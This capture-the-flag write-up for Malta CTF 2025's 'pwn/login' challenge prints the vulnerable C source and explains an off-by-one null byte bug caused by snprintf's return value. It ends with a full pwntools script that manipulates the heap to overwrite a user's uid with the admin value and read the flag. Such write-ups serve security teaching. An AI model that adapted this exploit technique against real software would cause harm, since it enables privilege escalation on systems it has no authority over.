[WRITE UP] - Malta CTF 2025

index

pwn/login

Challenge Information

Author

toasterpwn

Analysis

This challenge has contained a source code, which is a simple login program. The program has a function login that checks if the current user is an admin by comparing the user’s UID with ADMIN_UID. If the user is an admin, it reads a flag from a file called flag.txt and prints it.

Souce code

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
#include <fcntl.h>
5
#include <string.h>
6

7
#define NAME_LEN 0x24
8
#define BIO_LEN 0x30
9
#define USER_COUNT 0x10
10

11
#define ADMIN_UID 0
12
#define USER_UID 1
13

14
typedef struct user {
15
    unsigned int uid;
16
    char name[NAME_LEN];
17
    char bio[BIO_LEN];
18
} user_t;
19

20
unsigned int curr_uid = 1000;
21
user_t admin;
22
user_t* users[USER_COUNT];
23
unsigned int current_user;
24

25

26

27
int getint(const char* msg) {
28
    printf(msg);
29
    char buf[0x8] = {};
30
    int choice = -1;
31
    read(0, buf, sizeof(buf));
32
    return atoi(buf);
33

34
}
35

36
int menu() {
37
    printf("1) Create user\n");
38
    printf("2) Select user\n");
39
    printf("3) Print users\n");
40
    printf("4) Delete user\n");
41
    printf("4) Login\n");
42
    printf("5) Exit\n");
43
    return getint("> ");
44

45
}
46

47
int create() {
48
    int idx = -1;
49
    int ret = -1;
50

51
    char namebuf[NAME_LEN] = {};
52
    printf("Enter user index.\n");
53
    idx = getint("> ");
54
    if (idx < 0 || idx >= USER_COUNT) {
55
        printf("Invalid user index!\n");
56
        return -1;
57
    }
58

59
    users[idx] = calloc(1, sizeof(user_t));
60
    users[idx]->uid = curr_uid++;
61

62
    printf("Enter user name.\n> ");
63
    ret = read(0, users[idx]->name, NAME_LEN - 1);
64
    if (ret < 0) {
65
        printf("Failed to read user name!\n");
66
        free(users[idx]);
67
        users[idx] = NULL;
68
        return -1;
69
    }
70
    users[idx]->name[ret-1] = '\0'; // Add null terminator
71

72
    ret = snprintf(users[idx]->bio, BIO_LEN - 1, "%s is a really cool hacker\n", users[idx]->name);
73
    if (ret < 0) {
74
        printf("Failed to create user bio\n");
75
        free(users[idx]);
76
        users[idx] = NULL;
77
        return -1;
78
    }
79
    users[idx]->bio[ret-1] = '\0'; // BUG here
80

81
    return 0;
82
}
83

84
int select_user() {
85
    int idx = -1;
86
    printf("Enter user index.\n");
87
    idx = getint("> ");
88
    if (idx < 0 || idx >= USER_COUNT || !users[idx]) {
89
        printf("Invalid user index!\n");
90
        return -1;
91
    }
92

93
    current_user = idx;
94
    return 0;
95
}
96

97
int delete_user() {
98
    int idx = -1;
99
    printf("Enter user index.\n");
100
    idx = getint("> ");
101
    if (idx < 0 || idx >= USER_COUNT || !users[idx]) {
102
        printf("Invalid user index!\n");
103
        return -1;
104
    }
105

106
    free(users[idx]);
107
    users[idx] = NULL;
108
    return 0;
109
}
110

111
void print_users() {
112
    for (int i = 0; i < USER_COUNT; i++) {
113
        if (!users[i]) continue;
114

115
        printf("User %d\n", i);
116
        printf("UID : %u\n", users[i]->uid);
117
        printf("Name: %s\n", users[i]->name);
118
        printf("Bio : %s\n\n", users[i]->bio);
119
    }
120
}
121

122
int login() {
123
    if (users[current_user] && users[current_user]->uid == ADMIN_UID) {
124
        int fd = open("flag.txt", O_RDONLY);
125
        char buf[0x100] = {};
126
        if (fd < 0) {
127
            printf("Flag file does not exist.. if this is on remote, contact an admin.\n");
128
            return -1;
129
        }
130

131
        read(fd, buf, 0x100);
132
        printf("Hi admin, here is your flag: %s\n", buf);
133
        return 0;
134

135
    } else {
136
        printf("You don't have permission to do that....\n");
137
        return -1;
138
    }
139

140
}
141

142
void setup() {
143
    setvbuf(stdout, 0, 2, 0);
144
    setvbuf(stdin, 0, 2, 0);
145
    setvbuf(stderr, 0, 2, 0);
146
}
147

148
int main(void) {
149
    setup();
150
    admin.uid = 0;
151
    strcpy(admin.name, "admin");
152

153
    while (1) {
154
        int choice = menu();
155
        switch (choice) {
156
            case 1:
157
                if (create() < 0) {
158
                    printf("Failed to create user!\n");
159
                }
160
                break;
161
             case 2:
162
                if (select_user() < 0) {
163
                    printf("Failed to create user!\n");
164
                }
165
                break;
166

167
            case 3:
168
                print_users();
169
                break;
170

171
            case 4:
172
                if (delete_user() < 0) {
173
                    printf("Failed to delete user!\n");
174
                }
175
                break;
176

177
            case 5:
178
                if (login() < 0) {
179
                    printf("Failed to login!\n");
180
                }
181
                break;
182
            case 6:
183
                return 0;
184
                break;
185

186
            default:
187
                printf("Invalid choice.\n");
188
                break;
189
        }
190
    }
191
}

So if we look at the create function:

1
int create() {
2
    int idx = -1;
3
    int ret = -1;
4

5
    char namebuf[NAME_LEN] = {};
6
    printf("Enter user index.\n");
7
    idx = getint("> ");
8
    if (idx < 0 || idx >= USER_COUNT) {
9
        printf("Invalid user index!\n");
10
        return -1;
11
    }
12

13
    users[idx] = calloc(1, sizeof(user_t));
14
    users[idx]->uid = curr_uid++;
15

16
    printf("Enter user name.\n> ");
17
    ret = read(0, users[idx]->name, NAME_LEN - 1);
18
    if (ret < 0) {
19
        printf("Failed to read user name!\n");
20
        free(users[idx]);
21
        users[idx] = NULL;
22
        return -1;
23
    }
24
    users[idx]->name[ret-1] = '\0'; // Add null terminator
25

26
    ret = snprintf(users[idx]->bio, BIO_LEN - 1, "%s is a really cool hacker\n", users[idx]->name);
27
    if (ret < 0) {
28
        printf("Failed to create user bio\n");
29
        free(users[idx]);
30
        users[idx] = NULL;
31
        return -1;
32
    }
33
    users[idx]->bio[ret-1] = '\0'; // BUG here
34

35
    return 0;
36
}

we can see that the use of snprintf is incorrect, as it does not null-terminate the string properly. This can lead to a nullbyte overflow if the name is longer than expected. We can confirm by reading manpage of snprintf:

1
The functions snprintf() and vsnprintf() do not write more than size bytes (including the terminating null byte ('\0')). If the output was truncated due to this limit then the return value is the number of characters (excluding the terminating null byte) which would have been written to the final string if enough space had been available. Thus, a return value of size or more means that the output was truncated. (See also below under NOTES.)

So we can use this to our advantage by creating a user with a long name, which will cause the bio field to overflow and overwrite the uid field. This allows us to set the uid of the user to 0, which is the admin UID.

Exploit


40 collapsed lines
1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3
from pwnie import *
4
from subprocess import check_output
5
from time import sleep
6

7
context.log_level = 'debug'
8
context.terminal = ["wt.exe", "-w", "0", "split-pane", "--size", "0.65", "-d", ".", "wsl.exe", "-d", "Ubuntu-22.04", "--", "bash", "-c"]
9
exe = context.binary = ELF('./chal_patched', checksec=False)
10
libc = exe.libc
11

12
gdbscript = '''
13
init-pwndbg
14
# init-gef-bata
15
brva 0x1347
16
brva 0x14A5
17
brva 0x164E
18
brva 0x1783
19
brva 0x15B7
20
c
21
'''
22

23
def start(argv=[]):
24
    if args.REMOTE:
25
        return remote(sys.argv[1], sys.argv[2])
26
    elif args.DOCKER:
27
        p = remote("localhost", 5000)
28
        sleep(0.5)
29
        pid = int(check_output(["pidof", "-s", "/app/run"]))
30
        gdb.attach(int(pid), gdbscript=gdbscript+f"\n set sysroot /proc/{pid}/root\nfile /proc/{pid}/exe", exe=exe.path)
31
        pause()
32
        return p
33
    elif args.QEMU:
34
        if args.GDB:
35
            return process(["qemu-aarch64", "-g", "5000", "-L", "/usr/aarch64-linux-gnu", exe.path] + argv)
36
        else:
37
            return process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", exe.path] + argv)
38
    else:
39
        return process([exe.path] + argv, aslr=False)
40

41
def debug():
42
    gdb.attach(p, gdbscript=gdbscript)
43
    pause()
44

45
def create(idx, name):
46
    slna(b'> ', 1)
47
    slna(b'> ', idx)
48
    sa(b'> ', name)
49

50
def delete(idx):
51
    slna(b'> ', 4)
52
    slna(b'> ', idx)
53

54
def select(idx):
55
    slna(b'> ', 2)
56
    slna(b'> ', idx)
57

58
def login():
59
    slna(b'> ', 5)
60

61
# ==================== EXPLOIT ====================
62
p = start()
63

64
# Bug Off-by-Nullbyte in create function
65
# Goal: users[current_user] && users[current_user]->uid == ADMIN_UID
66

67
for i in range(7):
68
    create(i, str(i).encode())
69

70
for i in range(7):
71
    delete(i)
72

73
create(0, b'A')
74
create(1, b'B')
75
create(2, b'C')
76

77
delete(0)
78
create(0, b'A'*0x22)
79

80
delete(0)
81
create(0, b'A'*0x21)
82

83
select(1)
84
login()
85

86
interactive()
87
# maltactf{always_read_the_manpages!}